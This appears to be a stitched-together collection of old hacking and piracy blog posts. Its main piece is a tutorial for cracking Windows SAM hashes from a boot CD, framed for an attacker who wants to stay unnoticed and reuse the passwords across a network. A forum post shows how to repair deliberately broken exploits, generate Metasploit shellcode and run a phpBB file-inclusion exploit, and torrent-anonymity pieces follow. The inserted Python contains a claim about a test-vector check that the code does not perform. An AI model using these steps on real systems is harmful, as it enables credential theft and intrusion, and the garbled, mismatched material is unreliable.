
Cracking Syskey and the SAM on Windows XP, 2000 and NT 4


SysKey is an extra level of encryption put on the hashes in the SAM file [1]. SysKey was introduced in Service Pack 3 (SP3) for NT 4 but every version of Windows since has had SysKey enabled by default. The way most folks crack a SAM file on a system that uses SysKey is by running a utility called PWDump as an admin to get the LM (LAN Manager) and NT hashes. The problem is PWdump only works if you can run it from an administrator level account, and if the reason an attacker is cracking the hashes in the first place is to get an administrator level account then PWdump is of little use.

Some folks will ask why you would want to crack the passwords in the SAM at all, since it’s far easier to just change the Administrator password using a Linux boot disk or Sala’s Password Renew for PE Builder. The reason an attacker may want to crack the local passwords instead of changing them is twofold:

1. An attacker doesn’t want to tip off the system administrators. If they notice that the old local admin password no longer works they will get a little bit suspicious, don’t you think? This is somewhat solved by Sala’s Password Renew since it lets you add new admin level accounts as well as change existing accounts’ passwords.

2. The same local account passwords may be used on other systems on the network (and most likely are if they use imaging software like Ghost). If the attacker can crack one machine’s admin password that same password may allow the attacker to gain access to other boxes on that LAN that they only have remote access (across the network) to.

This article assumes that the attacker has only physical access to the machine whose SAM they want to crack and that they also have access to the Knoppix variant known as the Auditor security collection boot CD [5] (I’m using version 120305-01 in this tutorial). Here are the steps you will need to take in order to audit local passwords using the Auditor CD:

Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.

Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dells it’s F12).

Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.

Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.

Step 5. Mount the local hard disk, most likely hda1:

Linux Command:

mount /dev/hda1



Step 6. Change the present working directory to the ramdisk so we have space to work with the files we will be creating:

Linux Command:

cd /ramdisk/


Step 7. Auditor comes with Ncuomo’s Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to run Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32\config\SYSTEM, which is where it is on my XP Pro test box; on some systems it will be in C:\WINNT\system32\config\SYSTEM or perhaps on some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead; all later systems (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:

Linux Command:

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt


Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:

Linux Command:

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt > password-hashes.txt


Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that comes with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, I’ll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:

Linux Command:

gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz > /ramdisk/eng.txt




Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:

Linux Command:

john password-hashes.txt -w:eng.txt


John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format “NT LM DES [32/32 BS]” automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the -f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:

Linux Command:

john password-hashes.txt -f:NT -w:eng.txt


If dictionary attacks aren’t working and you have a lot of time (as well as a fast computer) you can try John’s incremental (brute force) mode and see if it gives you better results:

Linux Command:

john password-hashes.txt -i:all


Incremental mode is limited to eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Going beyond eight characters is pointless anyway if you have the LM hashes, since they are stored as two seven-byte parts (NT hashes are a different story and can be harder to crack).
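Before choosing between the default LM run and the -f:NT run, it helps to know which accounts in the dump still have an LM hash stored at all. The following Python is an added example and not part of the original tutorial: it parses a pwdump-format file such as password-hashes.txt and classifies each account using only the well-known empty-password LM and NT hash constants. The sample dump lines and every non-empty hash value in them are constructed.

```python
# Well-known LM and NT hashes of the empty password (public constants, not page-specific).
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"
LM_EMPTY_HALF = LM_EMPTY[16:]   # value of a 7-byte LM half that is all NUL padding
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the pwdump format samdump2 writes (user:RID:LM hash:NT hash:::).
# The banner line mimics the tool output seen in the session log; every non-empty hash
# value below is made up and corresponds to no real password.
SAMPLE_DUMP = """\
Samdump2 ncuomo@studenti.unina.it
Administrator:500:0102030405060708090a0b0c0d0e0f10:1112131415161718191a1b1c1d1e1f20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1001:aad3b435b51404eeaad3b435b51404ee:2122232425262728292a2b2c2d2e2f30:::
svc:1002:0102030405060708aad3b435b51404ee:3132333435363738393a3b3c3d3e3f40:::
"""


def parse_pwdump(text):
    """Yield (user, rid, lm, nt) for each account record; skip banners and blank lines."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()


def classify(lm, nt):
    """Describe an account's exposure from which hashes the SAM still stores."""
    if lm == LM_EMPTY and nt == NT_EMPTY:
        return "blank password"
    if lm == LM_EMPTY:
        # No LM hash at all: LM storage was disabled, or the password is over 14 characters.
        return "NT only (LM storage disabled or password longer than 14 characters)"
    if lm.endswith(LM_EMPTY_HALF):
        # Second half is the NUL-padding value, so the password is at most 7 characters.
        return "LM stored, 7 characters or fewer (one DES half to crack)"
    return "LM stored, 8 to 14 characters (two independent 7-byte halves)"


def audit(text):
    """Map each account name to its exposure class."""
    return {user: classify(lm, nt) for user, _rid, lm, nt in parse_pwdump(text)}


def lm_exposed(text):
    """Accounts that John's default LM mode would load; the -f:NT run is needed for the rest."""
    return [user for user, verdict in audit(text).items() if verdict.startswith("LM stored")]


def lm_halves(text):
    """Count non-empty LM halves, which is what John reports as 'Loaded N password hashes'
    in LM mode (a 6-character password contributes one half, a 10-character one two)."""
    halves = 0
    for _user, _rid, lm, _nt in parse_pwdump(text):
        halves += (lm[:16] != LM_EMPTY_HALF) + (lm[16:] != LM_EMPTY_HALF)
    return halves


if __name__ == "__main__":
    for user, verdict in audit(SAMPLE_DUMP).items():
        print(f"{user:14} {verdict}")
    print("LM halves John would load:", lm_halves(SAMPLE_DUMP))
```

Any account reported as "LM stored" is the one to fix first: its password is at most 14 characters and falls to the two-half attack described above regardless of its complexity.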

In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is “monkey”):

Session Log saved from Auditor CD:

root@1[~]# mount /dev/hda1
root@1[~]# cd /ramdisk/
root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt
Bkhive ncuomo@studenti.unina.it

Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01
root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt
Samdump2 ncuomo@studenti.unina.it
This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com)

No password for user Guest(501)
No V value!
root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt
root@1[ramdisk]# john password-hashes.txt -w:eng.txt
Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS])
MONKEY (Administrator)
guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ
root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt
Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4])
monkey (Administrator)
guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz
root@1[ramdisk]#



Mitigating SAM and SysKey Cracking

There are a few things you can do to make it harder for attackers to crack your local passwords. An attacker will most likely have to get into the BIOS to set it to boot from the CD-ROM. Setting up a BIOS password will help keep crackers from using the Auditor CD (or any boot CD), but if they can get into the computer’s case it’s easy to reset a BIOS password, so some sort of physical case lock should be used as well. Strong passwords (non-dictionary words with more than just alphanumeric characters) will also make it harder for attackers to crack passwords, since they will have to resort to potentially slow brute force methods.

I hope this short tutorial helps, feel free to write me if you have any questions. Some other techniques you may want to look into for faster cracking are cracking clusters [9] and Rainbow tables [10]. Enjoy your hash. :)





Get IP address anonymity everytime

I have found a piece of software that hides your IP address and gives you a new one each time by sending your traffic through the Tor network.

If you use Mozilla Firefox, it works very well.

First, download the Vidalia Bundle from here:


http://www.torproject.org/download.html.en

The link has builds for Windows and Mac OS, so download the one that matches your system.

To turn Tor on and off easily, you can install the Firefox add-on from here:


https://addons.mozilla.org/en-US/firefox/addon/2275

Then restart Firefox. After that you will see in the bottom right corner that the Tor add-on is installed. When you want to hide your IP address or surf anonymously, turn it on or off by clicking on it.

You can check your IP address here:

http://www.whatismyip.com/

Using exploits. Includes noob protection


Posted: Fri Dec 28, 2007 4:46 pm
I will discuss ways to handle and compile exploits. A lot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediately know that it shouldn't be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options

In the main window there will be a checkbox that says "Add the following commands when calling the compiler". Type this in the box: -lwsock32

press ok and compile again.
----

Using Shellcodes
You can generate shellcodes for Metasploit projects with ease. Here is one I made for this post.
Code:
/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */


You can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.

Then type the command you want it to execute, then press "generate payload".

Your shellcode should be printed out nicely for you.
- - -

Perl Exploits
If you're using Windows, install this MSI package. Let's use an example perl script from milw0rm. http://www.milw0rm.com/exploits/3661

Save that exploit to your C: drive as a file called "3661.pl". This exploit just generates an HTML file exploit, "exploit.html". It's that simple. But some exploits require you to have SSL installed, so you can grab that for Windows at the top of this post with the other downloads. Some exploits may require you to pass "arguments" to the application, like this exploit.

Uh oh, noob protection?

syntax error at C:\2552.pl line 47, near "print"
Execution of C:\2552.pl aborted due to compilation errors.

Well, instantly I see that the line $vul=" is on has no ";" at the end of it. Put that in there so it looks like this:




$host=$ARGV[0];
$path=$ARGV[1];
$vul="phpbb_security.php?phpbb_root_path=";





Now save it and try again. YAY




C:\>2552.pl

##########################################################################
# #
# phpBB Security <= 1.0.1 Remote File Include Vulnerability #
# Bug found By : Ashiyane Corporation #
# Email: nima salehi nima[at]ashiyane.ir #
# Web Site : www.Ashiyane.ir #
# #
##########################################################################

Usage: Ashiyane.pl [host] [path]

EX : Ashiyane.pl www.victim.com /path/





Most Popular Torrent Sites of 2007

1. Mininova

Without a doubt the most visited BitTorrent site. In November, Mininova reached a milestone by entering the list of the 50 most visited websites on the Internet.

Alexa rank: 46
2. IsoHunt

IsoHunt continued to grow this year. In September they were forced to close their trackers to US traffic because of the issues they have with the MPAA, but this had no effect on the visitor count.

Alexa rank: 143
3. The Pirate Bay

The Pirate Bay has been in the news quite a bit this year and remains not only the most used BitTorrent tracker, but also one of the most visited BitTorrent sites. At the moment they are fighting with IsoHunt for the second place in this list.

Alexa rank: 147
4. Torrentz

Torrentz is the only “torrent site” in the top 10 that doesn’t host .torrent files. Several improvements and new features have been introduced over the past year such as a comment system, private bookmarks and a cleaner layout.

Alexa rank: 160
5. BTjunkie

BTjunkie was one of the fastest risers last year and continued to grow throughout 2007. Last month they were, like many others, forced to leave their ISP (LeaseWeb), but the transition to a new host went smoothly and didn’t result in any downtime.

Alexa rank: 445
6. TorrentSpy

TorrentSpy was the most popular BitTorrent site of 2006, but dropped to sixth place due to legal issues with the MPAA. To ensure the privacy of their users, TorrentSpy decided that it was best to block access to all users from the US, causing their traffic to plunge.

Alexa rank: 461
7. TorrentPortal

Not much news about TorrentPortal this year, but that probably is a good thing. Like most other sites they have grown quite a bit in 2007.

Alexa rank: 481
8. GamesTorrents

It’s quite a surprise to see GamesTorrents in the list of 10 most popular BitTorrent sites of 2007. This Spanish BitTorrent site had a huge dip in traffic earlier this year but managed to secure 8th place.

Alexa rank: 583
9. TorrentReactor

TorrentReactor.net has been around for quite a while, four years to be exact, and is still growing.

Alexa rank: 604
10. BTmon

BTmon was one of the newcomers in 2006, and it is the youngest BitTorrent site in the top 10 this year.

Alexa rank: 673
Honorable Mention: Demonoid

For being one of the most visited BitTorrent sites until they pulled the plug in Novembe

How to make BitTorrent Transfers Anonymous

The Swedish Pirate Party introduced a completely anonymous internet service called relakks. Relakks makes it possible to browse the web, and use p2p-applications (like BitTorrent) without being monitored by your ISP or anti-piracy gangs like the MPAA and RIAA.

“There are many legitimate reasons to want to be completely anonymous on the Internet,” says Rickard Falkvinge, chairman of the Pirate Party. “If the government can check everything each citizen does, nobody can keep the government in check. The right to exchange information in private is fundamental to the democratic society. Without a safe and convenient way of accessing the Internet anonymously, this right is rendered null and void.”

Subscriptions cost EUR 5.00 per month or EUR 50.00 for 12 months.

Start your own BitTorrent tracker

To the novice, setting up a BitTorrent tracker is a hugely complex task. Within minutes of making the decision to even attempt such a thing, it becomes crystal clear that without specialist coding knowledge the project is doomed to fail, probably before it even starts. In order for BitTorrent tracker ownership to be accessible to all, the technical roadblocks need to be overcome.

The team behind XBTIT (previously BTiTracker) are hoping to achieve just that with their latest beta version.

XBTIT enables potential site administrators to quickly and easily set up their own BitTorrent tracker, something that was previously only available to people with some coding skills.

In order to make the process as user-friendly as possible, the team are offering some major upgrades and features:

Optional SMF Forum Integration

SMF is a fully featured bulletin board system which is very easy to set up. Downloaded and installed separately, user accounts are fully integrated with XBTIT after installation so there is no need for multiple log ins.

Optional XBT Tracker Integration

XBT Tracker is a BitTorrent tracker written in C++. The advantage of using it is that you can have many more peers than a traditional PHP based tracker while consuming very few resources on your server, making ownership of a very large tracker a reality.

One Click Hack/Modification Installation

All the best trackers have great modifications designed to bring additional functionality to the site. However, installing these can still be quite a task for the experienced - and absolutely mind-blowing for the novice. XBTIT offers One-Click-Hack which means no more having to hack away at lines of code to install the latest modifications for your tracker. An automated system for hack installation is included which is great news for the novice.

Fully Customizable Template System

This means there is no requirement to hack away at code to change the look of your site. Templates are now totally separate from the tracker source so it’s possible to tinker with the look of the site without worrying about breaking anything. New templates will be available with the final version of the software.

Updated Installation Routine

The new installation routine takes care of everything that previously had to be done by hand, saving much time when installing a new tracker.

The XBTIT team told us they are proud to be leading the way with what they believe is the most customizable and accessible tracker to date, and they are inviting any interested TorrentFreak readers to apply for beta testing at www.btiteam.org

How To Encrypt BitTorrent Traffic

The list of ISPs that limit BitTorrent traffic, or plan to do so, is growing every day, and according to the BBC, the ‘bandwidth war’ has begun.

Not sure if your traffic is being throttled? Check the list of bad ISPs.

But there is a solution. Encrypting your torrents will prevent throttling ISPs from shaping your traffic. I will explain how to enable encryption in Azureus, uTorrent, and Bitcomet, the three most popular torrent clients.

What does encryption do?

The RC4 encryption obfuscates not only the header but the entire stream. This means that it’s very hard for your ISP to detect that the traffic you are generating comes from BitTorrent.

Note that RC4 uses more CPU time than the plain encryption or no encryption. It is, however, harder for traffic shaping devices to identify.
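To show what "obfuscates the entire stream" means in practice, here is an added Python model of the Message Stream Encryption (MSE) scheme these clients negotiate; it is not code from the original post. The 768-bit DH prime, generator 2, the SHA1("keyA"/"keyB" + S + SKEY) key derivation and the 1024-byte RC4 discard are taken from the MSE spec and are assumptions here, since the page does not reproduce them; the info_hash, peer id and private exponents are constructed constants.

```python
import hashlib

# MSE parameters as published in the spec (assumed here; the page does not reproduce them):
# 768-bit DH prime, generator 2, SHA1 key derivation, RC4 with 1024 discarded keystream bytes.
MSE_P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A63A36210000000000090563", 16)
MSE_G = 2
RC4_DISCARD = 1024
HANDSHAKE_MARKER = b"\x13BitTorrent protocol"  # the plaintext a shaping box matches on


def rc4_keystream(key, n, discard=RC4_DISCARD):
    """Textbook RC4 (KSA then PRGA). MSE skips the first 1024 output bytes, whose bias is well known."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(discard + n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out[discard:])


def xor_bytes(data, stream):
    return bytes(a ^ b for a, b in zip(data, stream))


def dh_shared_secret(priv_a, priv_b):
    """Each side sends g^x mod p in the clear; both compute the same 96-byte secret S.
    The exchange is unauthenticated, so this is anti-shaping obfuscation, not a defence
    against an active man-in-the-middle."""
    pub_a, pub_b = pow(MSE_G, priv_a, MSE_P), pow(MSE_G, priv_b, MSE_P)
    s_a, s_b = pow(pub_b, priv_a, MSE_P), pow(pub_a, priv_b, MSE_P)
    assert s_a == s_b
    return s_a.to_bytes(96, "big")


def mse_keys(shared_secret, info_hash):
    """Per-direction RC4 keys: keyA for initiator->responder, keyB back. SKEY is the info_hash."""
    key_a = hashlib.sha1(b"keyA" + shared_secret + info_hash).digest()
    key_b = hashlib.sha1(b"keyB" + shared_secret + info_hash).digest()
    return key_a, key_b


def demo(priv_a=0x1F2E3D4C5B6A79, priv_b=0x9A8B7C6D5E4F31):
    """Encrypt a BitTorrent handshake under MSE and report what an on-path observer can see.
    Private exponents are constructed constants; real clients draw random 160-bit values."""
    info_hash = hashlib.sha1(b"constructed torrent metainfo").digest()   # constructed SKEY
    handshake = HANDSHAKE_MARKER + b"\x00" * 8 + info_hash + b"-EX0001-" + b"0" * 12
    secret = dh_shared_secret(priv_a, priv_b)
    key_a, _key_b = mse_keys(secret, info_hash)
    wire = xor_bytes(handshake, rc4_keystream(key_a, len(handshake)))
    # The responder holds the same S and serves the same torrent, so it derives the same keyA.
    recovered = xor_bytes(wire, rc4_keystream(key_a, len(wire)))
    # A peer that does not know the torrent (different SKEY) gets a different key even with S.
    wrong_key, _ = mse_keys(secret, hashlib.sha1(b"some other torrent").digest())
    wrong = xor_bytes(wire, rc4_keystream(wrong_key, len(wire)))
    return {
        "marker_on_wire": HANDSHAKE_MARKER in wire,
        "round_trip": recovered == handshake,
        "wrong_info_hash_decrypts": wrong == handshake,
    }


if __name__ == "__main__":
    print(demo())
```

The RC4 round trip is checked against the standard "Key"/"Plaintext" test vector so that the keystream, not just the framing, is known to be right.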

How can I do this?

This is different for all clients; check the setting for your favorite client below.

Azureus


1. Go to: Tools > Options > Connection > Transport Encryption

2. Check the ‘require encrypted transport’ box.

3. Choose RC4 in the ‘minimum encryption’ dropdown box

4. You can choose to tick the ‘Allow non-encrypted outgoing connections if encrypted connection attempt fails’ box. This will ensure compatibility with clients that are not using encryption. However, it makes it easier for your ISP to detect BitTorrent traffic. I recommend that you try ticking this box first; if you are still not getting proper speeds, untick it.

5. Tick the ‘Allow non-encrypted incoming connections’ box


That’s it, your BitTorrent traffic is encrypted now.

Bitcomet


1. Go to: Options > Preferences > Advanced > Connection

2. Go to ‘Protocol encryption’. You can choose between ‘auto detect’ and ‘always’. Auto detect will give you more connections but offers less protection against traffic shapers.

I would recommend trying ‘auto detect’ first; if that doesn’t increase your speeds, you need to switch to ‘always’.


That’s it, your BitTorrent traffic is encrypted now.

uTorrent


1. Go to: Options > Preferences > BitTorrent

2. Go to ‘Protocol encryption’, where you can choose between ‘enabled’ and ‘forced’. ‘Enabled’ will give you more connections but offers less protection against traffic shapers.

I would recommend trying ‘enabled’ first; if that doesn’t increase your speeds, you need to switch to ‘forced’.

3. Ticking ‘Allow legacy incoming connections’ allows non-encrypted clients to connect to you. This improves compatibility between clients but makes you more vulnerable to traffic shapers.

I would recommend ticking this box, but if that doesn’t increase your speeds, untick it!


That’s it, your BitTorrent traffic is encrypted now.